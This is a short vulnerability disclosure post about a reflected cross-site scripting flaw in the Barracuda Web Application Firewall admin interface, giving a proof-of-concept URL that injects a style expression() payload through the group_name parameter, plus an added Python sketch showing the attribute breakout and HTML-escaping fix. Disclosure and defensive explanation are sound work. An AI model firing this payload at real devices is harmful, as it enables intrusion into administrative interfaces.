Unfortunately this one is a bit late, but at the end of 2012 I came across a reflected XSS vulnerability within the Barracuda Web Application Firewall device.
This can be triggered by manipulating the ‘group_name’ URL parameter as follows:
http://192.168.0.31:8000/cgi-mod/index.cgi?&user=XXXXXXXXXXX&password=XXXXXXXXXXXXXXXXXX&et=XXXXXXXXX&auth_type=Local&locale=en_US&primary_tab=ADVANCED&secondary_tab=advanced_ip_config&group_name=%22%20style=%22xss:expression(alert('Cross Site Scripting on the WAF web interface !!!!!'))
Which results in the following:
A firmware patch was released (Version 7.7) to address this issue.
I would like to thank Barracuda for their good communication and turnaround in resolving this vulnerability.
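The leading %22 in the group_name value above decodes to a double quote, which closes the attribute the value is reflected into and lets the remainder be parsed as a new style attribute. The sketch below is an added example, not code from the original post or from Barracuda: it assumes a hypothetical template that reflects group_name into an input tag's value attribute, uses a constructed URL with a harmless MARKER in place of the script body, and compares the raw rendering with an HTML-attribute-encoded one.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request modelled on the URL in the post: placeholder host,
# credentials dropped, script body replaced by the inert token MARKER.
SAMPLE_URL = (
    "http://waf.example/cgi-mod/index.cgi?primary_tab=ADVANCED"
    "&group_name=%22%20style=%22xss:expression(MARKER)"
)
# Hypothetical template (assumption): the parameter lands inside value="...".
TEMPLATE = '<input type="hidden" name="group_name" value="%s">'


class AttrCollector(HTMLParser):
    """Records the attributes of every <input> tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def group_name_from(url):
    # parse_qs percent-decodes, so %22 arrives as a literal double quote.
    return parse_qs(urlsplit(url).query)["group_name"][0]


def render_unsafe(value):
    # The value is pasted into the attribute exactly as received.
    return TEMPLATE % value


def render_encoded(value):
    # quote=True turns " into &quot;, so the value cannot end the attribute.
    return TEMPLATE % html.escape(value, quote=True)


def parsed_attrs(markup):
    # Parse the markup the way a browser would split it into attributes.
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.inputs[0]


if __name__ == "__main__":
    value = group_name_from(SAMPLE_URL)
    print("unsafe :", parsed_attrs(render_unsafe(value)))
    print("encoded:", parsed_attrs(render_encoded(value)))
```

In the raw rendering the parser reports an empty value plus a separate style attribute; in the encoded rendering the whole string stays inside value.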